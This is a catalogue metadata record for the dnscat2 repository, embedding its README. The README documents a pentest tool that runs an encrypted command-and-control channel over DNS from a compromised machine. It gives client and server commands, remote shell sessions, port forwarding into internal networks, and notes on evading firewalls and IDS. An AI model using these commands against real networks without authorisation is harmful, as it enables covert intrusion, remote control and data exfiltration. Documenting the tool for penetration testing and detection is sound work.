{"id":13454464,"url":"https://github.com/iagox86/dnscat2","last_synced_at":"2025-05-14T17:10:03.775Z","repository":{"id":6217572,"uuid":"7448868","full_name":"iagox86/dnscat2","owner":"iagox86","description":null,"archived":false,"fork":false,"pushed_at":"2024-03-14T11:17:49.000Z","size":3916,"stargazers_count":3556,"open_issues_count":98,"forks_count":616,"subscribers_count":138,"default_branch":"master","last_synced_at":"2025-04-11T10:00:16.593Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":"PHP","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"bsd-3-clause","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/iagox86.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE.md","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2013-01-04T23:15:55.000Z","updated_at":"2025-04-11T06:40:06.000Z","dependencies_parsed_at":"2022-07-12T15:03:06.236Z","dependency_job_id":"fa95d1b3-d5c4-4ad7-ae9b-4fe151599493","html_url":"https://github.com/iagox86/dnscat2","commit_stats":null,"previous_names":[],"tags_count":6,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/iagox86%2Fdnscat2","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/iagox86%2Fdnscat2/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/iagox86%2Fdnscat2/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/iagox86%2Fdnscat2/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/iagox86","download_url":"https://codeload.github.com/iagox86/dnscat2/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":254190395,"owners_count":22029632,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-07-31T08:00:54.336Z","updated_at":"2025-05-14T17:10:03.750Z","avatar_url":"https://github.com/iagox86.png","language":"PHP","readme":"***** NOTE: The password for the .zip downloads are all \"password\"! *****\n\n# Introduction\n\nWelcome to dnscat2, a DNS tunnel that WON'T make you sick and kill you!\n\nThis tool is designed to create an encrypted command-and-control (C\u0026C)\nchannel over the DNS protocol, which is an effective tunnel out of\nalmost every network.\n\nThis README file should contain everything you need to get up and\nrunning! If you're interested in digging deeper into the protocol, how\nthe code is structured, future plans, or other esoteric stuff, check\nout the doc/ folder.\n\n# License\n\nThis is released under the BSD license. See [LICENSE.md](LICENSE.md) for\nmore information.\n\n# Overview\n\ndnscat2 comes in two parts: the client and the server.\n\nThe client is designed to be run on a compromised machine. It's written\nin C and has the minimum possible dependencies. It should run just about\nanywhere (if you find a system where it doesn't compile or run, please\nfile a ticket, particularly if you can help me get access to said\nsystem).\n\nWhen you run the client, you typically specify a domain name. All\nrequests will be sent to the local DNS server, which are then redirected\nto the authoritative DNS server for that domain (which you, presumably,\nhave control of).\n\nIf you don't have an authoritative DNS server, you can also use direct\nconnections on UDP/53 (or whatever you choose). They'll be faster, and\nstill look like DNS traffic to the casual viewer, but it's much more\nobvious in a packet log (all domains are prefixed with \"dnscat.\", unless\nyou hack the source). This mode will frequently be blocked by firewalls.\n\nThe server is designed to be run on an [authoritative DNS\nserver](doc/authoritative_dns_setup.md). It's in ruby, and depends on\nseveral different gems. When you run it, much like the client, you\nspecify which domain(s) it should listen for in addition to listening\nfor messages sent directly to it on UDP/53. When it receives traffic for\none of those domains, it attempts to establish a logical connection. If\nit receives other traffic, it ignores it by default, but can also\nforward it upstream.\n\nDetailed instructions for both parts are below.\n\n# How is this different from .....\n\ndnscat2 strives to be different from other DNS tunneling protocols by\nbeing designed for a special purpose: command and control.\n\nThis isn't designed to get you off a hotel network, or to get free\nInternet on a plane. And it doesn't just tunnel TCP.\n\nIt can tunnel any data, with no protocol attached. Which means it can\nupload and download files, it can run a shell, and it can do those\nthings well. It can also potentially tunnel TCP, but that's only going\nto be added in the context of a pen-testing tool (that is, tunneling TCP\ninto a network), not as a general purpose tunneling tool. That's been\ndone, it's not interesting (to me).\n\nIt's also encrypted by default. I don't believe any other public DNS\ntunnel encrypts all traffic!\n\n# Where to get it\n\nHere are some important links:\n\n* [Sourcecode on Github](https://github.com/iagox86/dnscat2)\n* [Downloads](https://downloads.skullsecurity.org/dnscat2/) (you'll find [signed](https://downloads.skullsecurity.org/ron.pgp) Linux 32-bit, Linux 64-bit, Win32, and source code versions of the client, plus an archive of the server - keep in mind that that signature file is hosted on the same server as the files, so if you're worried, please verify my PGP key :) )\n* [User documentation](/doc/README.md) A collection of files, both for end-users (like the [Changelog](doc/changelog.md)) and for developers (like the [Contributing](/doc/contributing.md) doc)\n* [Issue tracker](https://github.com/iagox86/dnscat2/issues) (you can also email me issues, just put my first name (ron) in front of my domain name (skullsecurity.net))\n\n# How to play\n\nThe theory behind dnscat2 is simple: it creates a tunnel over the DNS\nprotocol.\n\nWhy? Because DNS has an amazing property: it'll make its way from server\nto server until it figures out where it's supposed to go.\n\nThat means that for dnscat to get traffic off a secure network, it\nsimply has to send messages to *a* DNS server, which will happily\nforward things through the DNS network until it gets to *your* DNS\nserver.\n\nThat, of course, assumes you have access to an authoritative DNS server.\ndnscat2 also supports \"direct\" connections - that is, running a dnscat\nclient that directly connects to your dnscat on your ip address and UDP\nport 53 (by default). The traffic still looks like DNS traffic, and\nmight get past dumber IDS/IPS systems, but is still likely to be stopped\nby firewalls.\n\nIf you aren't clear on how to set up an authoritative DNS server, it's\nsomething you have to set up with a domain provider.\n[izhan](https://github.com/izhan) helpfully [wrote\none](https://github.com/iagox86/dnscat2/blob/master/doc/authoritative_dns_setup.md)\nfor you!\n\n## Compiling\n\n### Client\n\nCompiling the client should be pretty straight forward - all you should\nneed to compile is make/gcc (for Linux) or either Cygwin or Microsoft\nVisual Studio (for Windows). Here are the commands on Linux:\n\n $ git clone https://github.com/iagox86/dnscat2.git\n $ cd dnscat2/client/\n $ make\n\nOn Windows, load client/win32/dnscat2.vcproj into Visual Studio and hit\n\"build\". I created and test it on Visual Studio 2008 - until I get a\nfree legit copy of a newer version, I'll likely be sticking with that\none. :)\n\nIf compilation fails, please file a bug on my [github\npage](https://github.com/iagox86/dnscat2/issues)! Please send details\nabout your system.\n\nYou can verify dnscat2 is successfully compiled by running it with no\nflags; you'll see it attempting to start a DNS tunnel with whatever your\nconfigured DNS server is (which will fail):\n\n $ ./dnscat\n Starting DNS driver without a domain! This will only work if you\n are directly connecting to the dnscat2 server.\n \n You'll need to use --dns server=\u003cserver\u003e if you aren't.\n \n ** WARNING!\n *\n * It looks like you're running dnscat2 with the system DNS server,\n * and no domain name!*\n * That's cool, I'm not going to stop you, but the odds are really,\n * really high that this won't work. You either need to provide a\n * domain to use DNS resolution (requires an authoritative server):\n *\n * dnscat mydomain.com\n *\n * Or you have to provide a server to connect directly to:\n *\n * dnscat --dns=server=1.2.3.4,port=53\n *\n * I'm going to let this keep running, but once again, this likely\n * isn't what you want!\n *\n ** WARNING!\n \n Creating DNS driver:\n domain = (null)\n host = 0.0.0.0\n port = 53\n type = TXT,CNAME,MX\n server = 4.2.2.1\n [[ ERROR ]] :: DNS: RCODE_NAME_ERROR\n [[ ERROR ]] :: DNS: RCODE_NAME_ERROR\n [[ ERROR ]] :: DNS: RCODE_NAME_ERROR\n [[ ERROR ]] :: DNS: RCODE_NAME_ERROR\n [[ ERROR ]] :: DNS: RCODE_NAME_ERROR\n [[ ERROR ]] :: DNS: RCODE_NAME_ERROR\n [[ ERROR ]] :: DNS: RCODE_NAME_ERROR\n [[ ERROR ]] :: DNS: RCODE_NAME_ERROR\n [[ ERROR ]] :: DNS: RCODE_NAME_ERROR\n [[ ERROR ]] :: DNS: RCODE_NAME_ERROR\n [[ ERROR ]] :: The server hasn't returned a valid response in the last 10 attempts.. closing session.\n [[ FATAL ]] :: There are no active sessions left! Goodbye!\n [[ WARNING ]] :: Terminating\n\n### Server\n\nThe server isn't \"compiled\", as such, but it does require some Ruby\ndependencies. Unfortunately, Ruby dependencies can be annoying to get\nworking, so good luck! If any Ruby experts out there want to help make\nthis section better, I'd be grateful!\n\nI'm assuming you have Ruby and Gem installed and in working order. If\nthey aren't, install them with either `apt-get`, `emerge`, `rvm`, or\nhowever is normal on your operating system.\n\nOnce Ruby/Gem are sorted out, run these commands (note: you can\nobviously skip the `git clone` command if you already installed the\nclient and skip `gem install bundler` if you've already installed\nbundler):\n\n $ git clone https://github.com/iagox86/dnscat2.git\n $ cd dnscat2/server/\n $ gem install bundler\n $ bundle install\n\nIf you get a permissions error with `gem install bundler` or `bundler\ninstall`, you may need to run them as root. If you have a lot of\nproblems, uninstall Ruby/Gem and install everything using `rvm` and\nwithout root.\n\nIf you get an error that looks like this:\n\n /usr/lib/ruby/1.9.1/rubygems/custom_require.rb:36:in `require': cannot load such file -- mkmf (LoadError)\n\nIt means you need to install the -dev version of Ruby:\n\n $ sudo apt-get install ruby-dev\n\nI find that `sudo` isn't always enough to get everything working right,\nI sometimes have to switch to root and work directly as that account.\n`rvmsudo` doesn't help, because it breaks ctrl-z.\n\nYou can verify the server is working by running it with no flags and\nseeing if you get a dnscat2\u003e prompt:\n\n # ruby ./dnscat2.rb\n\n New window created: 0\n Welcome to dnscat2! Some documentation may be out of date.\n\n passthrough =\u003e disabled\n auto_attach =\u003e false\n auto_command =\u003e\n process =\u003e\n history_size (for new windows) =\u003e 1000\n New window created: dns1\n Starting Dnscat2 DNS server on 0.0.0.0:53\n [domains = n/a]...\n\n It looks like you didn't give me any domains to recognize!\n That's cool, though, you can still use direct queries,\n although those are less stealthy.\n\n To talk directly to the server without a domain name, run:\n ./dnscat2 --dns server=x.x.x.x,port=53\n\n Of course, you have to figure out \u003cserver\u003e yourself! Clients\n will connect directly on UDP port 53.\n\n dnscat2\u003e\n\nIf you don't run it as root, you might have trouble listening on UDP/53\n(you can use --dnsport to change it). You'll see an error message if\nthat's the case.\n\n#### Ruby as root\n\nIf you're having trouble running Ruby as root, this is what I do to run\nit the first time:\n\n $ cd dnscat2/server\n $ su\n # gpg --keyserver hkp://keys.gnupg.net --recv-keys 409B6B1796C275462A1703113804BB82D39DC0E3\n # \\curl -sSL https://get.rvm.io | bash\n # source /etc/profile.d/rvm.sh\n # rvm install 1.9\n # rvm use 1.9\n # bundle install\n # ruby ./dnscat2.rb\n\nAnd subsequent times:\n\n $ cd dnscat2/server\n $ su\n # source /etc/profile.d/rvm.sh\n # ruby ./dnscat2.rb\n\n`rvmsudo` should make it easier, but dnscat2 doesn't play well with\n`rvmsudo` unfortunately.\n\n\n## Usage\n\n### Client + server\n\nBefore we talk about how to specifically use the tools, let's talk about\nhow dnscat is structured. The dnscat tool is divided into two pieces: a\nclient and a server. As you noticed if you went through the compilation,\nthe client is written in C and the server is in Ruby.\n\nGenerally, the server is run first. It can be long lived, and handle as\nmany clients as you'd like. As I said before, it's basically a C\u0026C\nservice.\n\nLater, a client is run, which opens a session with the server (more on\nsessions below). The session can either traverse the DNS hierarchy\n(recommended, but more complex) or connect directly to the server.\nTraversing the DNS hierarchy requires an authoritative domain, but will\nbypass most firewalls. Connecting directly to the server is more\nobvious for several reasons.\n\nBy default, connections are automatically encrypted (turn it off on the\nclient with `--no-encryption` and on the server with `--security=open`).\nWhen establishing a new connection, if you're paranoid about\nman-in-the-middle attacks, you have two options for verifying the peer:\n\n* Pass a pre-shared secret using the `--secret` argument on both sides\n to validate the connection\n* Manually verify the \"short authentication string\" - a series of words\n that are printed on both the client and server after encryption is\n negotiated\n\n### Running a server\n\nThe server - which is typically run on the authoritative DNS server for\na particular domain - is designed to be feature-ful, interactive, and\nuser friendly. It's written in Ruby, and much of its design is inspired\nby Metasploit and Meterpreter.\n\nIf you followed the compilation instructions above, you should be able\nto just run the server:\n\n $ ruby ./dnscat2.rb skullseclabs.org\n\nWhere \"skullseclabs.org\" is your own domain. If you don't have an\nauthoritative DNS server, it isn't mandatory; but this tool works way,\nway better with an authoritative server.\n\nThat should actually be all you need! Other than that, you can test it\nusing the client's --ping command on any other system, which should be\navailable if you've compiled it:\n\n $ ./dnscat --ping skullseclabs.org\n\nIf the ping succeeds, your C\u0026C server is probably good! If you ran the\nDNS server on a different port, or if you need to use a custom DNS\nresolver, you can use the --dns flag in addition to --ping:\n\n $ ./dnscat --dns server=8.8.8.8,domain=skullseclabs.org --ping\n\n $ ./dnscat --dns port=53531,server=localhost,domain=skullseclabs.org --ping\n\nNote that when you specify a --dns argument, the domain has to be part\nof that argument (as domain=xxx). You can't just pass it on the\ncommandline (due to a limitation of my command parsing; I'll likely\nimprove that in a future release).\n\nWhen the process is running, you can start a new server using basically\nthe exact same syntax:\n\n dnscat2\u003e start --dns=port=53532,domain=skullseclabs.org,domain=test.com\n New window created: dns2\n Starting Dnscat2 DNS server on 0.0.0.0:53532\n [domains = skullseclabs.org, test.com]...\n \n Assuming you have an authoritative DNS server, you can run\n the client anywhere with the following:\n ./dnscat2 skullseclabs.org\n ./dnscat2 test.com\n \n To talk directly to the server without a domain name, run:\n ./dnscat2 --dns server=x.x.x.x,port=53532\n \n Of course, you have to figure out \u003cserver\u003e yourself! Clients\n will connect directly on UDP port 53532.\n\nYou can run as many DNS listeners as you want, as long as they're on\ndifferent hosts/ports. Once the data comes in, the rest of the process\ndoesn't even know which listener data came from; in fact, a client can\nsend different packets to different ports, and the session will continue\nas expected.\n\n### Running a client\n\nThe client - which is typically run on a system after compromising it -\nis designed to be simple, stable, and portable. It's written in C and\nhas as few library dependencies as possible, and compiles/runs natively\non Linux, Windows, Cygwin, FreeBSD, and Mac OS X.\n\nThe client is given the domain name on the commandline, for example:\n\n ./dnscat2 skullseclabs.org\n\nIn that example, it will create a C\u0026C session with the dnscat2 server\nrunning on skullseclabs.org. If an authoritative domain isn't an option,\nit can be given a specific ip address to connect to instead:\n\n ./dnscat2 --dns host=206.220.196.59,port=5353\n\nAssuming there's a dnscat2 server running on that host/port, it'll\ncreate a session there.\n\n### Tunnels\n\nYo dawg; I hear you like tunnels, so now you can tunnel a tunnel through\nyour tunnel!\n\nIt is currently possible to tunnel a connection through dnscat2, similar\nto \"ssh -L\"! Other modes (\"ssh -D\" and \"ssh -R\") are coming soon as\nwell!\n\nAfter a session has started (a command session), the command \"listen\" is\nused to open a new tunnelled port. The syntax is roughly the same as ssh\n-L:\n\n listen [lhost:]lport rhost:rport\n\nThe local host is option, and will default to all interfaces (0.0.0.0).\nThe local port and remote host/port are mandatory.\n\nThe dnscat2 server will listen on lport. All connections received to\nthat port are forwarded, via the dnscat2 client, to the remote host/port\nchosen.\n\nFor example, this will listen on port 4444 (on the *server*) and forward\ntraffic to google:\n\n listen 4444 www.google.com:80\n\nThen, if you connect to http://localhost:4444, it'll come out the\ndnscat2 client and connect to google.com.\n\nLet's say you're using this on a pentest and you want to forward ssh\nconnections through the dnscat2 client (running on somebody's corp\nnetwork) to an internal device. You can!\n\n listen 127.0.0.1:2222 10.10.10.10:22\n\nThat'll only listen on the localhost interface on the dnscat2 server,\nand will forward connections via the tunnel to port 22 of 10.10.10.10.\n\n### Encryption\n\ndnscat2 is encrypted by default.\n\nI'm not a cryptographer, and by necessity I came up with the encryption\nscheme myself. As a result, I wouldn't trust this 100%. I think I did a\n*pretty* good job preventing attacks, but this hasn't been\nprofessionally audited. Use with caution.\n\nThere is a ton of technical information about the encryption in the\n[protocol doc](/doc/protocol.md). But here are the basics.\n\nBy default, both the client and the server support and will attempt\nencryption. Each connection uses a new keypair, negotiated by ECDH. All\nencryption is done by salsa20, and signatures use sha3.\n\nEncryption can be disabled on the client by passing `--no-encryption` on\nthe commandline, or by compiling it using `make nocrypto`.\n\nThe server will reject unencrypted connections by default. To allow\nunencrypted connections, pass `--security=open` to the server, or run\n`set security=open` on the console.\n\nBy default, there's no protection against man-in-the-middle attacks. As\nmentioned before, there are two different ways to gain MitM protection:\na pre-shared secret or a \"short authentication string\".\n\nA pre-shared secret is passed on the commandline to both the client and\nthe server, and is used to authenticate both the client to the server\nand the server to the client. It should be a somewhat strong value -\nsomething that can't be quickly guessed by an attacker (there's only a\nshort window for the attacker to guess it, so it only has to hold up for\na few seconds).\n\nThe pre-shared secret is passed in via the `--secret` parameter on both\nthe client and the server. The server can change it at runtime using\n`set secret=\u003cnew value\u003e`, but that can have unexpected results if active\nclients are connected.\n\nFurthermore, the server can enforce *only* authenticated connections are\nallowed by using `--security=authenticated` or `set\nsecurity=authenticated`. That's enabled by default if you pass the\n`--secret` parameter.\n\nIf you don't require the extra effort of authenticating connections,\nthen a \"short authentication string\" is displayed by both the client and\nthe server. The short authentication string is a series of English words\nthat are derived based on the secret values that both sides share.\n\nIf the same set of English words are printed on both the client and the server,\nthe connection can be reasonably considered to be secure.\n\nThat's about all you need to know about the encryption! See the protocol\ndoc for details! I'd love to hear any feedback on the crypto, as well.\n:)\n\nAnd finally, if you have any problems with the crypto, please let me\nknow! By default a window called \"crypto-debug\" will be created at the\nstart. If you have encryption problems, please send me that log! Or,\nbetter yet, run dnscat2 with the `--firehose` and `--packet-trace`\narguments, and send me *EVERYTHING*! Don't worry about revealing private\nkeys; they're only used for that one session.\n\n### dnscat2's Windows\n\nThe dnscat2 UI is made up of a bunch of windows. The default window is\ncalled the 'main' window. You can get a list of windows by typing\n`windows` (or `sessions`) into any command prompt:\n\n dnscat2\u003e windows\n 0 :: main [active]\n dns1 :: DNS Driver running on 0.0.0.0:53 domains = skullseclabs.org [*]\n\nYou'll note that there are two windows - window `0` is the main window,\nand window `dns1` is the listener (technically referred to as the\n'tunnel driver').\n\nFrom any window that accepts commands (`main` and command sessions), you\ncan type `help` to get a list of commands:\n\n dnscat2\u003e help\n \n Here is a list of commands (use -h on any of them for additional help):\n * echo\n * help\n * kill\n * quit\n * set\n * start\n * stop\n * tunnels\n * unset\n * window\n * windows\n\nFor any of those commands, you can use -h or --help to get details:\n\n dnscat2\u003e window --help\n Error: The user requested help\n \n Interact with a window\n -i, --i=\u003cs\u003e Interact with the chosen window\n -h, --help Show this message\n\nWe'll use the `window` command to interact with `dns1`, which is a\nstatus window:\n\n dnscat2\u003e window -i dns1\n New window created: dns1\n Starting Dnscat2 DNS server on 0.0.0.0:53531\n [domains = skullseclabs.org]...\n \n Assuming you have an authoritative DNS server, you can run\n the client anywhere with the following:\n ./dnscat2 skullseclabs.org\n \n To talk directly to the server without a domain name, run:\n ./dnscat2 --dns server=x.x.x.x,port=53531\n \n Of course, you have to figure out \u003cserver\u003e yourself! Clients\n will connect directly on UDP port 53531.\n \n Received: dnscat.9fa0ff178f72686d6c716c6376697968657a6d716800 (TXT)\n Sending: 9fa0ff178f72686d6c716c6376697968657a6d716800\n Received: d17cff3e747073776c776d70656b73786f646f616200.skullseclabs.org (MX)\n Sending: d17cff3e747073776c776d70656b73786f646f616200.skullseclabs.org\n\nThe received and sent strings there are, if you decode them, pings.\n\nYou can switch to the 'parent' window (in this case, `main`) by pressing\nctrl-z. If ctrl-z kills the process, then you probably have to find a\nbetter way to run it (`rvmsudo` doesn't work, see above).\n\nWhen a new client connects and creates a session, you'll be notified in\n`main` (and certain other windows):\n\n New window created: 1\n dnscat2\u003e\n\n(Note that you have to press enter to get the prompt back)\n\nYou can switch to the new window the same way we switched to the `dns1`\nstatus window:\n\n dnscat2\u003e window -i 1\n New window created: 1\n history_size (session) =\u003e 1000\n This is a command session!\n \n That means you can enter a dnscat2 command such as\n 'ping'! For a full list of clients, try 'help'.\n \n command session (ubuntu-64) 1\u003e\n\nCommand sessions can spawn additional sessions; for example, the `shell`\ncommand:\n\n command session (ubuntu-64) 1\u003e shell\n Sent request to execute a shell\n New window created: 2\n Shell session created!\n\n command session (ubuntu-64) 1\u003e\n\n(Note that throughout this document I'm cleaning up the output; usually\nyou have to press enter to get the prompt back)\n\nThen, if you return to the main session (ctrl-z or `suspend`, you'll see\nit in the list of windows:\n\n dnscat2\u003e windows\n 0 :: main [active]\n dns1 :: DNS Driver running on 0.0.0.0:53531 domains = skullseclabs.org [*]\n 1 :: command session (ubuntu-64)\n 2 :: sh (ubuntu-64) [*]\n\nUnfortunately, the 'windows' command in a specific command session only\nshows child windows from that session, and right now new sessions aren't\nspawned as children.\n\nNote that some sessions have `[*]` - that means that there's been\nactivity since the last time we looked at them.\n\nWhen you interact with a session, the interface will look different\ndepending on the session type. As you saw with the default session type\n(command sessions) you get a UI just like the top-level session (you can\ntype 'help' or run commands or whatever). However, if you interact with\na 'shell' session, you won't see much immediately, until you type a\ncommand:\n\n dnscat2\u003e windows\n 0 :: main [active]\n dns1 :: DNS Driver running on 0.0.0.0:53531 domains = skullseclabs.org [*]\n 1 :: command session (ubuntu-64)\n 2 :: sh (ubuntu-64) [*]\n \n dnscat2\u003e session -i 2\n New window created: 2\n history_size (session) =\u003e 1000\n This is a console session!\n \n That means that anything you type will be sent as-is to the\n client, and anything they type will be displayed as-is on the\n screen! If the client is executing a command and you don't\n see a prompt, try typing 'pwd' or something!\n \n To go back, type ctrl-z.\n \n sh (ubuntu-64) 2\u003e pwd\n /home/ron/tools/dnscat2/client\n\nTo escape this, you can use ctrl-z or type \"exit\" (which will kill the\nsession).\n\nLastly, to kill a session, the `kill` command can be used:\n\n dnscat2\u003e windows\n 0 :: main [active]\n dns1 :: DNS Driver running on 0.0.0.0:53531 domains = skullseclabs.org [*]\n 1 :: command session (ubuntu-64)\n 2 :: sh (ubuntu-64) [*]\n dnscat2\u003e kill 2\n Session 2 has been sent the kill signal!\n Session 2 has been killed\n dnscat2\u003e windows\n 0 :: main [active]\n dns1 :: DNS Driver running on 0.0.0.0:53531 domains = skullseclabs.org [*]\n 1 :: command session (ubuntu-64)\n\n# History\n\nIn the past, there were several DNS tunneling tools. One was called\n[dnscat](http://tadek.pietraszek.org/projects/DNScat/index.html), written by Tadek Pietraszek. The problem is, it's written in Java, and I really wanted something that could run basically everywhere.\n\nThat version of dnscat was based on a tool called NSTX, whose page [no\nlonger exists](http://freecode.com/projects/nstx/) and isn't even in the\nWayback Machine, so I know nothing about it.\n\nLater, I wrote a C implementation and called it dnscat (without\npermission), since the previous Java version was unmaintained and I\nreally liked the name (I toyed with calling it dnscat-ng, but -ng is a\nbit wordy for my taste). It worked, but there were a lot of problems.\nThe client and server were the same tool, like netcat, which, because\nDNS is such a client/server model, didn't work out that well. The other\nproblem was that I had linked it too much to the DNS protocol, so it\ncould only run over DNS.\n\ndnscat2 - the successor to dnscat - is an attempt to right some of the\nwrongs that I had committed. dnscat2 has a separate server (Ruby) and\nclient (C) and treats everything as a stream of bytes, and uses a\ndriver, of sorts, to convert that stream of bytes into dns requests and\nback. Thus, it's a layered protocol, with DNS being a lower layer.\n\nAs a result, I invented a protocol that I'm calling the dnscat protocol.\nYou can find documentation about it in docs/protocol.md. It's a simple\npolling network protocol, where the client occasionally polls the\nserver, and the server responds with a message (or an error code). The\nprotocol is designed to be resilient to the various issues I had with\ndnscat1 - that is, it can handle out-of-order packets, dropped packets,\nand duplicated packets equally well.\n","funding_links":[],"categories":["WELCOME","\u003ca id=\"7485e724ef5efd1daf9d672bd72fb595\"\u003e\u003c/a\u003eDNS协议","PHP","Exfiltration Tools","Forensics","C++","\u003ca id=\"1a9934198e37d6d06b881705b863afc8\"\u003e\u003c/a\u003e通信\u0026\u0026代理\u0026\u0026反向代理\u0026\u0026隧道","其他_安全与渗透","\u003ca id=\"01e6651181d405ecdcd92a452989e7e0\"\u003e\u003c/a\u003e工具","others","\u003ca id=\"5dd93fbc2f2ebc8d98672b2d95782af3\"\u003e\u003c/a\u003e工具","Network Tools","Tools"],"sub_categories":["**Pentesting Tools**","\u003ca id=\"d70a62f77fa20a2219e81fa61527e644\"\u003e\u003c/a\u003e工具","Zealandia","\u003ca id=\"e996f5ff54050629de0d9d5e68fcb630\"\u003e\u003c/a\u003e隧道","网络服务_其他","\u003ca id=\"9d6789f22a280f5bb6491d1353b02384\"\u003e\u003c/a\u003e隧道\u0026\u0026穿透","\u003ca id=\"98a851c8e6744850efcb27b8e93dff73\"\u003e\u003c/a\u003eC\u0026C","Forensics","Exfiltration Tools","Open Source"],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fiagox86%2Fdnscat2","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fiagox86%2Fdnscat2","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fiagox86%2Fdnscat2/lists"}